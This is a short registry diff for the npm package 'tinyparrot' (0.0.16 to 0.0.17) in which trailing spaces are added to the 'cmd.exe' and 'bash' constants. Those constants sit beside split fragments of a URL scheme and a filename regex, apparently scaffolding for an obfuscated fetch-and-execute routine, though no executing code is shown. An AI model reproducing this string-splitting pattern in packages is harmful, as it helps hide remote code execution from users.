tinyparrot 0.0.16 → 0.0.17
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/src/const.js +2 -2
package/package.json
CHANGED
package/src/const.js
CHANGED
|
@@ -4,9 +4,9 @@ const method = "POST";
|
|
|
4
4
|
const headers = {'Content-Type': 'application/json'};
|
|
5
5
|
const platform = process.platform.toLowerCase();
|
|
6
6
|
const os = require('os').type().toLowerCase();
|
|
7
|
-
const cmd = 'cmd.exe';
|
|
7
|
+
const cmd = 'cmd.exe ';
|
|
8
8
|
const profile = "\:\/\/"
|
|
9
|
-
const bash = 'bash';
|
|
9
|
+
const bash = 'bash ';
|
|
10
10
|
const source = '-mirror';
|
|
11
11
|
const reader = "https";
|
|
12
12
|
const reg = /filename="?([^"]+)"?/;
|